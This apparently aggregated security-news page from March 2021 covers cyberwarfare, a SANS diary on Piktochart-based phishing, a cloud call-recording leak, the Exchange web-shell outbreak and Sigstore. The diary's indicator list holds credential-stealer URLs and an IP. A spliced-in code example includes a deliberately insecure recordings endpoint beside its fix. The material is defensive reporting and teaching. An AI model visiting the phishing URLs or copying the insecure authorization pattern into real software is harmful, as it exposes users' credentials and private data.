Malware Devil

Thursday, March 11, 2021

The Future of Cyberwarfare


Over the years, we have seen an escalation in the series of hacks on health care services, power grids, nuclear plants and our privacy, with no respite. The threat is not just from China alone. It could be from North Korea or, as a matter of fact, from any state or non-state actor. This intent..

The post The Future of Cyberwarfare appeared first on Security Boulevard.


The post The Future of Cyberwarfare appeared first on Malware Devil.



https://malwaredevil.com/2021/03/11/the-future-of-cyberwarfare/?utm_source=rss&utm_medium=rss&utm_campaign=the-future-of-cyberwarfare

India and China’s Conflict Goes Cyber


In early March, Recorded Future’s Insikt Group published a report titled China-Linked Group RedEcho Targets the Indian Power Sector, which detailed China’s targeting of ten different Indian organizations within the energy sector, specifically the power generation and transmission sector and two from the maritime sector. In the Insikt Group assessment, there are “significant concerns over..

The post India and China’s Conflict Goes Cyber appeared first on Security Boulevard.


Piktochart – Phishing with Infographics, (Thu, Mar 11th)

[This is a guest diary submitted by JB Bowers]

In line with our recent diaries featuring unique attack vectors for credential theft, such as phishing over LinkedIn Mail[1] and pretending to be an Outlook version update[2], we’ve recently learned of a phishing campaign targeting users of the infographic service Piktochart.

During the COVID-19 pandemic, nearly every kind of company has moved to use more online collaboration tools. This means that many small businesses, universities, primary and secondary schools, and others that may not be well-trained in online safety will be especially vulnerable to this type of attack, especially if they are using a relatively new tool like Piktochart.

I had not used Piktochart before, but this week, security researcher @pageinsec[3] shared with me an infographic that asks the user to click on a link, in order to read a shared pdf document [4].

Piktochart has about 2,000 registered users and about 24 million Piktocharts created, and is used by companies such as Forbes, TechCrunch, and others, according to their website. With a legitimate business purpose that is endorsed by some large companies, it is likely this is an effective way for the attackers to evade DNS filtering or other simple defenses against credential-stealing attacks.

Piktochart has a feature that makes it even better for phishing: registered “Pro users” can download an actual .pdf file, with the malicious link intact, or render the file into several different sizes of .png images, as indicated in the IOCs near the bottom of this page, which might be useful to hunt for similar activity.

An unsuspecting victim would receive an e-mail or social media post including the malicious Piktochart, from someone they knew whose account had already been compromised. If they click the link, a second-stage credential stealer follows, which is a pretty decent-looking (but fake) Microsoft login page hosted at the domain obggladdenlightfoundation(.)org. This base domain currently has “0 out of 87” vendors reporting it as malicious on VirusTotal, and is made out to be a non-profit in Lagos, Nigeria. This specific example had a different site registration than most of the other, identical sites I’ve researched, so it is possible this site was the result of a takeover of a legitimate business’ WordPress website, or a redirection of the site’s DNS.


Despite the technical simplicity, this is a dangerous campaign since it is after Microsoft 365 (Office 365) credentials, and evidence points to the same IP being used for a large variety of credential theft sites. There are quite a few domains on the same IP[5], for example:

pwan-heritage(.)com/pol/OfficeV4/*
secure-official-spotify.pwanplus(.)com
www.dhl-delivery-failure-resolve.naijamail(.)com – This one includes a nice-looking DHL form [6]

Indicators of compromise – IOCs  

URLs/Domains
create.piktochart.com/output/52653368-my-visual
piktochart.com (if not needed for business)

2nd stage/stealer
obggladdenlightfoundation.org/dfsmith/ofc3
obggladdenlightfoundation.org/dfsmith/ofc3/
obggladdenlightfoundation.org/dfsmith/ofc3/r.php?signin=d41d8cd98f00b204e9800998ecf8427e&auth=39bea2eedcf78c893b4d0898d91bba501390ced533b8de1d796bcc5973da76e5b1cf6668
obggladdenlightfoundation.org/dfsmith/ofc3/s/?signin=d41d8cd98f00b204e9800998ecf8427e&auth=39bea2eedcf78c893b4d0898d91bba501390ced533b8de1d796bcc5973da76e5b1cf666

IP
%%ip:173.231.197.145%% [7]
Hostname:    ded5495.inmotionhosting.com

Domain registrar: 007NAMES INC.
*Used in most of the domains

Microsoft cred stealer image – hashes
7, 10, and 3kb versions of the same image (the first value is 64 hex characters, i.e. SHA-256; the second is 128 hex characters, i.e. SHA-512)
a90370dc587b73cd2dbe33504794e83c83dc9f365cd9cd94511593046db5ae09
bc2afe6e49541902541497a6823e1aa0f8e8683e203d4da6bc75590bddebeb702bed6013d59910f6714448cafeda98708886d48978b6b991627526964379efc0

DOM (cred-stealer page)

<form id="1MDAwMDMxMjAyMS0wMy0wMjE2MTQ2NTgwMDQ4NTgxMTAx"> <input type="hidden" value="[removed]"><input type="hidden" value="[removed]"> </form>

Post request

<form id="f2" method="post" action="#" style="margin-bottom: 0px;"> <input required="" type="email" placeholder="Email, phone, or Skype" name="e" style="outline:none; background-color:transparent;border:0px solid;height:30px;width:300px;font-weight:lighter;font-size:15px;margin-left:5px;padding-bottom:0px;padding-top:0px;"> <img src="data:image/png;base64"…

Cookies (both show an expiry of 1969-12-31 23:59:59, i.e. Unix time -1, which is how the browser export represents session cookies with no explicit expiry)
obggladdenlightfoundation.org/    Name: PHPSESSID
obggladdenlightfoundation.org/dfsmith/ofc3/s    Name: ip11
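As an added example, not part of the diary above, here is a small Python hunting script that refangs the indicators listed above and checks them against proxy log lines. The log lines and their “timestamp client dst_ip method url” layout are constructed for the example and are not real traffic. Host matching treats subdomains of a listed domain as hits (the attackers' sites sit under several hostnames on one IP) but not lookalikes such as pwan-heritage.com.example.net, and a path indicator only matches on a “/” boundary.

```python
import re
from urllib.parse import urlsplit

# Indicators copied from the IOC list above, in the defanged forms the diary uses
# ("(.)" for dots, the ISC "%%ip:...%%" markup for the IP).
RAW_IOCS = [
    "create.piktochart.com/output/52653368-my-visual",
    "obggladdenlightfoundation(.)org/dfsmith/ofc3",
    "pwan-heritage(.)com/pol/OfficeV4/",
    "secure-official-spotify.pwanplus(.)com",
    "www.dhl-delivery-failure-resolve.naijamail(.)com",
    "%%ip:173.231.197.145%%",
]

# Constructed proxy log, not real traffic: "<timestamp> <client> <dst_ip> <method> <url>".
SAMPLE_LOG = """\
2021-03-11T09:14:02Z 10.0.0.12 173.231.197.145 GET http://obggladdenlightfoundation.org/dfsmith/ofc3/s/?signin=d41d8cd9
2021-03-11T09:14:05Z 10.0.0.12 198.51.100.20 GET https://create.piktochart.com/output/52653368-my-visual
2021-03-11T09:15:11Z 10.0.0.33 198.51.100.21 GET https://www.microsoft.com/en-us/
2021-03-11T09:16:40Z 10.0.0.40 173.231.197.145 POST http://cdn.pwan-heritage.com/pol/OfficeV4/r.php
2021-03-11T09:17:00Z 10.0.0.41 198.51.100.22 GET https://pwan-heritage.com.example.net/login
"""


def refang(ioc):
    """Turn a defanged indicator back into its real form so it can be compared."""
    ioc = ioc.strip()
    ioc = re.sub(r"^%%ip:(.+?)%%$", r"\1", ioc)            # ISC ip markup
    ioc = re.sub(r"\(\.\)|\[\.\]", ".", ioc)                # (.) and [.] dots
    ioc = re.sub(r"^hxxp(s?)://", r"http\1://", ioc, flags=re.I)
    return ioc


def parse_ioc(raw):
    """Classify an indicator as an IP or a host with an optional path prefix."""
    ioc = refang(raw)
    if re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", ioc):
        return {"raw": raw, "kind": "ip", "value": ioc}
    if "://" not in ioc:
        ioc = "http://" + ioc                               # urlsplit needs a scheme
    u = urlsplit(ioc)
    return {"raw": raw, "kind": "host", "host": u.hostname.lower(),
            "path": u.path.rstrip("/")}


def host_matches(host, ioc_host):
    """Exact host or a subdomain of it; 'ioc_host.example.net' lookalikes do not match."""
    return host == ioc_host or host.endswith("." + ioc_host)


def path_matches(path, ioc_path):
    """Empty IOC path matches anything; otherwise match the prefix on a '/' boundary."""
    return not ioc_path or path == ioc_path or path.startswith(ioc_path + "/")


def match_entry(entry, iocs):
    """Return the list of indicators this log entry hits (empty if clean)."""
    u = urlsplit(entry["url"])
    host = (u.hostname or "").lower()
    path = u.path or "/"
    reasons = []
    for ioc in iocs:
        if ioc["kind"] == "ip" and entry["dst_ip"] == ioc["value"]:
            reasons.append("dst_ip " + ioc["raw"])
        elif ioc["kind"] == "host" and host_matches(host, ioc["host"]) \
                and path_matches(path, ioc["path"]):
            reasons.append("url " + ioc["raw"])
    return reasons


def hunt(log_text, raw_iocs):
    """Map line number -> matched indicators for every log line that hits an IOC."""
    iocs = [parse_ioc(r) for r in raw_iocs]
    hits = {}
    for n, line in enumerate(log_text.splitlines(), 1):
        if not line.strip():
            continue
        ts, client, dst_ip, method, url = line.split(maxsplit=4)
        reasons = match_entry({"dst_ip": dst_ip, "url": url}, iocs)
        if reasons:
            hits[n] = reasons
    return hits


if __name__ == "__main__":
    for n, reasons in hunt(SAMPLE_LOG, RAW_IOCS).items():
        print(f"line {n}: {', '.join(reasons)}")
```

Lines 1, 2 and 4 of the sample log are flagged (line 1 and 4 on both the URL and the shared hosting IP); line 5 is not, because a domain that merely begins with a listed one is not a subdomain of it.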

 JB Bowers
@cherokeejb_

References:
[1] – https://isc.sans.edu/forums/diary/The+new+LinkedInSecureMessage/27110
[2] – https://isc.sans.edu/forums/diary/Pretending+to+be+an+Outlook+Version+Update/27144/
[3] – https://apageinsec.wordpress.com/
[4] – https://create.piktochart.com/output/52653368-my-visual
[5] – https://urlscan.io/result/e02ea839-9671-4d31-a039-effd54877c0b/related/
[6] – https://urlscan.io/screenshots/205111b7-b981-48e9-9359-df55f278163b.png
[7] – https://isc.sans.edu/ipinfo.html?ip=173.231.197.145

 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.


ISC Stormcast For Thursday, March 11th, 2021 https://isc.sans.edu/podcastdetail.html?id=7408, (Thu, Mar 11th)


iPhone app exposed other people’s call recordings

Video and audio are huge privacy concerns for people. If something goes wrong with tech it can have major ramifications. You’re likely very familiar with warnings about video. However, audio hasn’t always been so prominent. It’s only really since the rise of home assistants like Amazon’s Alexa that audio worries have gone mainstream.

Turning up the volume on audio threats

Bluetooth earphones and similar devices have only helped to raise awareness of potential issues, as we consider the tools we use the most. As that earlier post notes, it’s generally a lot harder to secure sound than vision. There isn’t an audio equivalent of the bit of tape over your webcam. You’re dealing with the innards of your device and that’s not for everyone. Either the hardware tinkering is beyond them, or their audio setup is a confusing mess of six audio devices and brand-specific audio controls.

It isn’t easy, and that’s just for desktop. Mobile is another proposition altogether, being an incredibly personal device yet something of a mystery-box to many owners. How does your Android phone work? Which version of Android is it even? How do the basic settings differ on your phone from mine? You’re giving me an iPhone for work? Sorry, I’ve never used one of those before.

These are just a sample selection of the things you’ll run into if you’ve ever been nominated your household’s Christmas season tech support. Worse, a lot of what seems to happen on a phone actually happens in the cloud (such as interpreting voice commands), where it’s completely beyond your reach.

Which brings us neatly to a recent discovery.

Listening in to someone else’s recordings

Researchers found an issue with an iPhone call recording app, which boasts of “more than 1,000,000 downloads”. Used to record and share clips via email, or saved to storage solutions such as Dropbox and Google Drive, it offers a fair bit of flexibility for people in need of some audio recording.

The researcher who discovered the vulnerability used various security testing tools to view and modify network traffic used by the app. From there, they discovered it was possible to replace their own phone number with someone else’s. With that done, recordings from that phone (located in the cloud, in an Amazon AWS bucket) were available to them, without a password. The entire call history and the numbers the calls were made to were also available, at least until the app was updated and the problem fixed by the developers.

Or, as the researchers at PingSafe put it:

The vulnerability allowed any malicious actor to listen to any user’s call recording from the cloud storage bucket of the application and an unauthenticated API endpoint which leaked the cloud storage URL of the victim’s data

Considering the kind of recordings people could make, this is a worrying thing to have happened. Think of all the business sensitive conversations people might have, or personal discussions, random thoughts, or anything else. Yes, we can argue people shouldn’t upload mission critical work conversations into the cloud (or even a laundry list of complaints about their neighbour). However, if you give people a recording app then record they will.
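The flaw as described is an authorization failure: the server trusts a client-supplied phone number to decide whose recordings to hand back. The following Python is an added illustration, not the app’s code or PingSafe’s proof of concept; the account table, object keys, bucket name and the HMAC-signed URL scheme are assumptions made for the example. It places the vulnerable handler beside a hardened one that ties the requested number to the authenticated session and returns short-lived signed URLs instead of raw bucket paths.

```python
import hashlib
import hmac
import time
from urllib.parse import parse_qs, urlencode, urlsplit

# Constructed sample data (hypothetical accounts, numbers and object keys).
ACCOUNTS = {"user-a": "+15550100", "user-b": "+15550199"}          # session user -> own number
RECORDINGS = {                                                      # number -> objects in bucket
    "+15550100": ["calls/15550100/2021-03-01.m4a"],
    "+15550199": ["calls/15550199/2021-03-02.m4a", "calls/15550199/2021-03-05.m4a"],
}
BUCKET = "https://recordings.example.invalid"      # placeholder, not the app's real bucket
SIGNING_KEY = b"server-side secret, never sent to the client"  # assumption: lives only on the server
URL_TTL = 300                                      # seconds a signed URL stays valid


class Forbidden(Exception):
    pass


def vulnerable_list_recordings(params):
    """The pattern described above: the phone number in the request selects whose
    recordings come back, and nothing ties that number to an authenticated caller."""
    number = params["phone"]
    return [f"{BUCKET}/{key}" for key in RECORDINGS.get(number, [])]


def presign(key, now=None):
    """Short-lived URL bound to one object: an HMAC over key and expiry, checked at download."""
    exp = int((time.time() if now is None else now) + URL_TTL)
    sig = hmac.new(SIGNING_KEY, f"{key}\n{exp}".encode(), hashlib.sha256).hexdigest()
    return f"{BUCKET}/{key}?" + urlencode({"exp": exp, "sig": sig})


def verify_presigned(url, now=None):
    """What the download side checks before serving the object."""
    u = urlsplit(url)
    key = u.path.lstrip("/")
    q = parse_qs(u.query)
    try:
        exp, sig = int(q["exp"][0]), q["sig"][0]
    except (KeyError, ValueError, IndexError):
        return False
    if (time.time() if now is None else now) > exp:
        return False
    expected = hmac.new(SIGNING_KEY, f"{key}\n{exp}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(sig, expected)


def hardened_list_recordings(session_user, params, now=None):
    """Same endpoint with the two missing controls: the requested number must belong to
    the authenticated session, and the client gets expiring signed URLs, not bucket paths."""
    number = params["phone"]
    if ACCOUNTS.get(session_user) != number:
        raise Forbidden("phone number is not owned by the authenticated user")
    return [presign(key, now) for key in RECORDINGS.get(number, [])]
```

The ownership check is the actual fix; the signed URLs are the second layer, so that even a leaked URL stops working after a few minutes and cannot be edited to point at another object.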

The perils of audio data in the cloud

TechCrunch reports there were 130,000+ audio recordings, weighing in at some 300GB in size, in the storage bucket. That’s a lot of potential for mischief, pranks, trolling, or just plain old blackmail and extortion. If we’re lucky, the only person who noticed this was the researcher who reported it.

Audio has always been a source for security and privacy concerns. Whether we’re talking fake Twitch audio fixes or where people’s data ends up, it’s always worth keeping in mind.

It might not be as visible a concern as the usual security hot-spots on your laptops and mobile devices, or as obvious as video. All the same, it’s an important part of your overall security hygiene.

This is probably an excellent moment to check:

  • if your audio software needs updating
  • your streaming accounts are secure
  • you’re happy with any audio files kept in the cloud

Follow these steps and hopefully your audio security will soon catch up with your visual-based best practices.

The post iPhone app exposed other people’s call recordings appeared first on Malwarebytes Labs.


If you have an F5, it’s time to patch! Thanks Michele for the link to today’s crop of F5 CVE’s, which include an unauthenticated RCE against the API, and another RCE against “hidden” config pages! https://support.f5.com/csp/article/K02566623, (Wed, Mar 10th)

=============== Rob VandenBrink coherentsecurity.com


Tuesday, March 9, 2021

Microsoft, DoD, Alexa, Intel, Aaran Leyland, & Side Channel Attacks – SWN #105

This week Dr. Doug talks More Microsoft attacks and more info on the Exchange server attacks, a new Intel Side Channel attack, Your python may be poisoned, the DoD let down its guard on contractors, & Aaran Leyland returns for guest Expert Commentary!

Time Stamps:

1:36- Fake Google reCaptcha attack phishes for Office365 Users
3:12 – HAFNIUM attack explained with source code examples.
4:30 – New Side Channel Attack targets Intel with Ring Interconnect latency attack https://www.instapaper.com/read/1393789534 — source code
7:19 – GAO reports that DoD contractors are not subject to Cybersecurity Requirements
8:45 – Poisoned Python Packages Proliferate
11: – Aaran Leyland
28:34 – Can Alexa listen to your heartbeat out there in the dark?

Visit https://www.securityweekly.com/swn for all the latest episodes!

Show Notes: https://securityweekly.com/swn105


Microsoft Patch Tuesday Updates Fix 14 Critical Bugs

Microsoft’s regularly scheduled March Patch Tuesday updates address 89 CVEs overall.

Microsoft Patch Tuesday Fixes 82 CVEs, Internet Explorer Zero-Day

The monthly rollout follows last week’s emergency Microsoft Exchange Server patch covering seven CVEs, four of which are under attack.

Microsoft today released 82 security fixes as part of its monthly Patch Tuesday rollout, which this month addresses 10 critical vulnerabilities and one Internet Explorer zero-day. This brings its March patch count to 89 after the release of emergency patches for seven CVEs last week.

The out-of-band Exchange patch released March 2 covers seven unique CVEs, four of which are under active attack. Organizations running on-premises Exchange Servers are advised to address the vulnerabilities as soon as possible, as attackers are continuing to scan for and exploit them.

Microsoft today pushed additional patches for older, unsupported versions of Exchange Server.

Today’s Patch Tuesday release addresses vulnerabilities in Microsoft Windows, Azure and Azure DevOps, Azure Sphere, Internet Explorer, the Edge browser, Office and Office Services and Web Apps, SharePoint Server, Visual Studio, and Windows Hyper-V. One is both publicly known and under active attack.

That is CVE-2021-26411, a memory corruption vulnerability in Internet Explorer that could let a successful attacker run code on a target system if a victim views a specially designed HTML file. This affects older versions such as Internet Explorer 11, and newer EdgeHTML-based versions.

“This kind of exploit would give the attacker the same operating system permissions as the user visiting the website,” says Kevin Breen, director of cyber-threat research at Immersive Labs. “So, if you’re browsing the Internet as a standard user, the attacker will get user level access to your file system and limited access to the operating system.”

It’s a reminder that employees should never browse the Web while logged in with admin privileges, he adds. If a victim is browsing the Internet as an admin, attackers could get “full unrestricted access” to the file system and operating system, Breen adds. Microsoft notes the attack to exploit this critical flaw is low in complexity and requires no privileges.

Also worth noting is CVE-2021-26897, a critical remote code execution (RCE) vulnerability in Windows DNS Server. Microsoft patched five RCE flaws in DNS Server this month; this is the only one rated Critical. It is also rated “exploitation more likely” by Microsoft, and requires no privileges and low attack complexity.

“These attacks are not limited to external attackers — they also become a target for attackers who may already be inside your network,” Breen says. “An attacker gaining access to manipulate a DNS server within your organization can have a significant impact on your overall security.”

Another CVE that draws attention to privileges is CVE-2021-27076, an RCE vulnerability in SharePoint Server. This is also categorized as “exploitation more likely” and indicates an attacker could exploit the server to gain code execution over the network. A successful attacker would need privileges to create or modify Sites in SharePoint, which authenticated users can do by default. It’s a reminder that users who don’t need specific privileges shouldn’t have them.

Today’s Critical patches also address two RCE flaws in Azure Sphere, both of which are unsigned code execution vulnerabilities. However, users likely won’t need to take action because devices running Azure Sphere connected to the Internet get automatic updates, as Dustin Childs, with Trend Micro’s Zero-Day Initiative, points out. These flaws are listed as CVE-2021-27074 and CVE-2021-27080.

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance & Technology, where she covered financial … View Full Bio


Dark Web Markets for Stolen Data See Banner Sales

Despite an explosion in the sheer amount of stolen data available on the Dark Web, the value of personal information is holding steady, according to the 2021 Dark Web price index from Privacy Affairs. That leaves these thriving dirty data dealers in a familiar predicament — they need to lock down their growing businesses for […]

MetalBallStudios: Size Of The Internet – Bytes In Perspective


The post MetalBallStudios: Size Of The Internet – Bytes In Perspective appeared first on Security Boulevard.


Warning the World of a Ticking Time Bomb

Globally, hundreds of thousands of organizations running Exchange email servers from Microsoft just got mass-hacked, including at least 30,000 victims in the United States. Each hacked server has been retrofitted with a “web shell” backdoor that gives the bad guys total, remote control, the ability to read all email, and easy access to the victim’s other computers. Researchers are now racing to identify, alert and help victims, and hopefully prevent further mayhem.

On Mar. 5, KrebsOnSecurity broke the news that at least 30,000 organizations and hundreds of thousands globally had been hacked. The same sources who shared those figures say the victim list has grown considerably since then, with many victims compromised by multiple cybercrime groups.

Security experts are now trying to alert and assist these victims before malicious hackers launch what many refer to with a mix of dread and anticipation as “Stage 2,” when the bad guys revisit all these hacked servers and seed them with ransomware or else additional hacking tools for crawling even deeper into victim networks.

But that rescue effort has been stymied by the sheer volume of attacks on these Exchange vulnerabilities, and by the number of apparently distinct hacking groups that are vying for control over vulnerable systems.

A security expert who has briefed federal and military advisors on the threat says many victims appear to have more than one type of backdoor installed. Some victims had three of these web shells installed. One was pelted with eight distinct backdoors. This initially caused a major overcount of potential victims, and required a great deal of de-duping various victim lists.

The source, who spoke on condition of anonymity, said many in the cybersecurity community recently saw a large spike in attacks on thousands of Exchange servers that was later linked to a profit-motivated cybercriminal group.

“What we thought was Stage 2 actually was one criminal group hijacking like 10,000 exchange servers,” said one source who’s briefed U.S. national security advisors on the outbreak.

On Mar. 2, when Microsoft released updates to plug the four Exchange flaws being attacked, it attributed the hacking activity to a previously unidentified Chinese cyber espionage group it called “Hafnium.” Microsoft said Hafnium had been using the Exchange flaws to conduct a series of low-and-slow attacks against specific strategic targets, such as non-governmental organizations (NGOs) and think tanks.

But by Feb. 26, that relatively stealthy activity was morphing into the indiscriminate mass-exploitation of all vulnerable Exchange servers. That means even Exchange users that patched the same day Microsoft released security updates may have had servers seeded with backdoors.

Many experts who spoke to KrebsOnSecurity said they believe different cybercriminal groups somehow learned of Microsoft’s plans to ship fixes for the Exchange flaws a week earlier than they’d hoped (Microsoft originally targeted today, Patch Tuesday, as the release date).

The vulnerability scanning activity also ramped up markedly after Microsoft released its updates on Mar. 2. Security researchers love to tear apart patches for clues about the underlying security holes, and one major concern is that various cybercriminal groups may have already worked out how to exploit the flaws independently.

AVERTING MASS-RANSOMWARE

Security experts now are desperately trying to reach tens of thousands of victim organizations with a single message: Whether you have patched yet or have been hacked, backup any data stored on those servers immediately.

Every source I’ve spoken with about this incident says they fully expect profit-motivated cybercriminals to pounce on victims by mass-deploying ransomware. Given that so many groups now have backdoor web shells installed, it would be trivial to unleash ransomware on the lot of them in one go. Also, compromised Exchange servers can be a virtual doorway into the rest of the victim’s network.

“With the number of different threat actors dropping [web] shells on servers increasing, ransomware is inevitable,” said Allison Nixon, chief research officer at Unit221B, a New York City-based cyber investigations firm.

So far there are no signs of victims of this mass-hack being ransomed. But that may well change if the exploit code used to break into these vulnerable Exchange servers goes public. And nobody I’ve interviewed seems to think working exploit code is going to stay unpublished for much longer.

When that happens, the exploits will get folded into publicly available exploit testing kits, effectively making it simple for any attacker to find and compromise a decent number of victims who haven’t already patched.

CHECK MY OWA

Nixon is part of a group of security industry leaders who are contributing data and time to a new victim notification platform online called Check My OWA (Outlook Web Access, the Internet-facing Web component of Exchange Server machines).

Checkmyowa.unit221b.com checks whether your Exchange Server domain showed up in attack logs or lists of known-compromised domains.

Perhaps it’s better to call it a self-notification service that is operated from Unit221B’s own web site. It draws on tens of thousands of data points that various ISPs and hosting firms have tied to victims around the world who are likely compromised by the backdoor shells. The data comes from large networks watching the sources and targets of mass-scans for vulnerable Exchange servers.

“Our goal is to motivate people who we might otherwise have never been able to contact,” Nixon said. “My hope is if this site can get out there, then there’s a chance some victim companies are notified and take action or can get attention.”

Enter an email address at Check My OWA, and if that address matches a domain name for a victim organization, that email address will get a notice.

If the email’s domain name (anything to the right of the @ sign) is detected in their database, the site will send that user an email stating that it has observed the email domain in a list of targeted domains.

“Malicious actors were able to successfully compromise, and some of this information suggested they may have been able to install a webshell on an Exchange server associated with this domain,” reads one of the messages to victims. “We strongly recommend saving an offline backup of your Exchange server’s emails immediately, and refer back to the site for additional information on patching and remediation.”

Other Exchange users may see this message:

“We have observed your e-mail domain appears in our list of domains the malicious actors were able to successfully compromise, and some of this information suggested they may have been able to install a webshell on an Exchange server associated with this domain. We strongly recommend saving an offline backup of your Exchange server’s emails immediately, and refer back to the site for additional information on patching and remediation.”

Nixon said Exchange users can save themselves a potentially nightmarish scenario if they just back up any affected systems now. And given the number of adversaries currently attacking still-unpatched Exchange systems, there is almost no way this won’t end in disaster for at least some victims.

“There are researchers running honeypots to [attract] attacks from different groups, and those honeypots are getting shelled left and right,” she said. “The sooner they can run a backup, the better. This can help save a lot of heartache.”

Oh, and one more important thing: You’ll want to keep any backups disconnected from everything. Ransomware has a tendency to infect everything it can, so make sure at least one backup is stored completely offline.

“Just disconnect them from a computer, put them in a safe place and pray you don’t need them,” Nixon said.


Phishing, Scam, & Marketing Emails: What’s the Difference?

When it comes to email communications today, phishing and spam are both unwelcome nuisances in everyone’s inbox. In order to defend against the different tactics cybercriminals are leveraging online, a variety of essential security measures are necessary–one of the most important being general awareness.  Even though the words “phishing” and “spam” are often used […]

The post Phishing, Scam, & Marketing Emails: What’s the Difference? appeared first on Hurricane Labs.

The post Phishing, Scam, & Marketing Emails: What’s the Difference? appeared first on Security Boulevard.


Adobe Critical Code-Execution Flaws Plague Windows Users

The critical flaws exist in Adobe Framemaker, Connect and the Creative Cloud desktop application for Windows.

Linux Foundation Debuts Sigstore Project for Software Signing

Sigstore aims to improve the open source software supply chain by simplifying the process of cryptographic software signing.

The Linux Foundation today announced its launch of Sigstore, a new nonprofit initiative that aims to improve open source software supply chain security by making it easier for developers to adopt cryptographic signing for different components of the software development process.

Sigstore will be free for software providers and developers, who can use it to securely sign software artifacts such as release files, container images, binaries, and bill-of-materials manifests. Signing materials are then stored in a tamper-evident public log. The service’s code and operation tooling will be fully open source and maintained and developed by the Sigstore community.

Founding members include Red Hat, Google, and Purdue University. The idea for the service came from Luke Hinds, security engineering lead in Red Hat’s Office of the CTO. He pitched the concept to Google software engineer Dan Lorenc, and the two began to work on it. Now the Sigstore project has a “small but agile community” working on its development, Lorenc says.

Software supply chains face security risks. Users are exposed to targeted attacks, as well as account and cryptographic key compromise. Keys are difficult for software maintainers to manage. Software projects often have a list of keys in use, and maintainers must handle the keys of people no longer involved. These public keys are often stored on git repo readme files or websites, where they may be susceptible to tampering and don’t securely convey trust.

Software signing is meant to convey trust. The process of digitally signing software is meant to provide evidence that the code comes from a known developer or software vendor and hasn’t been tampered with. This gives users confidence they’re using code from a trusted source.

But few open source projects cryptographically sign software artifacts. “We spent almost the last nine months or so talking to different open source maintainers and communities on how they’re doing this, if they’re not doing this [then] why not, and then user perspective: Do you care if people are signing? How do you know what keys to check against?” Lorenc says.

Their team found “a huge amount lacking in the space,” he continues. Most software projects aren’t doing anything at all to improve secure software signing. The tool sets many have used in the past require signing one another’s keys in person, which doesn’t work for remote developers, Hinds adds. Sigstore aims both to ease the adoption of software signing and to lower its risk.

“When you take on signing, you take on a lot of risk as well, because … you have to protect a private key and this really exposes the risk of a project,” Hinds continues. “It’s a kind of chicken and egg: The need to sign things to provide assurance to their users, but once they do start to sign things, they up the ante around their attack surface and a possible key compromise.”

How It Works
To make the process simple, Sigstore relies on the OpenID authentication protocol to connect certificates to identities. This allows developers to use security controls they already have, such as multifactor authentication, one-time passwords, and hardware token generators.

Existing signing solutions essentially work to build a whole new identity system, and give users private keys they’re responsible for protecting, Lorenc explains. Sigstore “piggybacks off of an existing identity system that everybody already knows how to work with, that’s already federated, and already gets all the attention of security professionals at organizations.”

Sigstore users run its tooling to create ephemeral, short-lived key pairs. Its public key infrastructure (PKI) service issues a signing certificate once the OpenID Connect grant succeeds. From there, certificates are recorded into a certificate transparency log, and software signing materials go to a signature transparency log, Sigstore explains on its website.

These transparency logs are a public and tamper-proof record of sign-in events, Hinds notes. “By having that available, anybody can audit or monitor these logs for who’s signing what. It makes it publicly transparent,” he adds. Anyone can query the logs by an artifact’s digest, or return the entries signed by a specific public key or email address.

Because the keys are short-lived, there is no concern about keys being left behind and exposed to compromise, Hinds says. After signing, there is nothing left for the developer to manage, and all activity is recorded in the log.
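The keyless flow described above, as an added example in Go that is not Sigstore’s own code: an ephemeral key signs an artifact digest, the signature and public key are appended to a hash-chained log standing in for the signature transparency log, and a consumer verifies by digest and identity. It assumes the OpenID Connect step has already produced the identity string and omits certificate issuance.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
)

// Entry is one record in an append-only signature transparency log: what was
// signed, by which short-lived key, for which identity. Records are hash-chained.
type Entry struct {
	Digest   string           // hex SHA-256 of the artifact
	Sig      []byte           // ECDSA signature over that digest
	Pub      *ecdsa.PublicKey // ephemeral public key, kept so anyone can re-verify
	Identity string           // identity the OpenID Connect token asserted (constructed)
	PrevHash string           // hash of the previous record ("" for the first)
	Hash     string           // hash of this record, including PrevHash
}

func hashEntry(e Entry) string {
	h := sha256.New()
	h.Write([]byte(e.Digest + "|" + e.Identity + "|" + e.PrevHash))
	h.Write(e.Sig)
	h.Write(append(e.Pub.X.Bytes(), e.Pub.Y.Bytes()...))
	return hex.EncodeToString(h.Sum(nil))
}

// Sign is the developer side: mint an ephemeral P-256 key, sign the artifact
// digest, append signature and public key to the log, let the key go out of scope.
func Sign(log []Entry, artifact []byte, identity string) ([]Entry, error) {
	priv, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return log, err
	}
	d := sha256.Sum256(artifact)
	sig, err := ecdsa.SignASN1(rand.Reader, priv, d[:])
	if err != nil {
		return log, err
	}
	e := Entry{Digest: hex.EncodeToString(d[:]), Sig: sig, Pub: &priv.PublicKey, Identity: identity}
	if n := len(log); n > 0 {
		e.PrevHash = log[n-1].Hash
	}
	e.Hash = hashEntry(e)
	return append(log, e), nil
}

// Verify is the consumer side: walk the whole log checking the chain, and accept
// only if an intact record binds exactly this digest to the expected identity.
func Verify(log []Entry, artifact []byte, identity string) bool {
	d := sha256.Sum256(artifact)
	prev, ok := "", false
	for _, e := range log {
		if e.PrevHash != prev || hashEntry(e) != e.Hash {
			return false // tampered or reordered log
		}
		prev = e.Hash
		if e.Digest == hex.EncodeToString(d[:]) && e.Identity == identity {
			ok = ok || ecdsa.VerifyASN1(e.Pub, d[:], e.Sig)
		}
	}
	return ok
}
```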

Today marks the launch of the foundation, Hinds says. While the transparency log is fully functional, Sigstore isn’t available to developers just yet. As for what developers will be able to sign and store, the team is first aiming for generic release artifacts such as compiled binaries and container images. Later on, they plan to explore other formats and manifest signing.

The team hopes Sigstore will be made available later this year, though an official date has not yet been determined.

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance & Technology, where she covered financial …




https://malwaredevil.com/2021/03/09/linux-foundation-debuts-sigstore-project-for-software-signing/?utm_source=rss&utm_medium=rss&utm_campaign=linux-foundation-debuts-sigstore-project-for-software-signing

Microsoft Exchange attacks cause panic as criminals go shell collecting

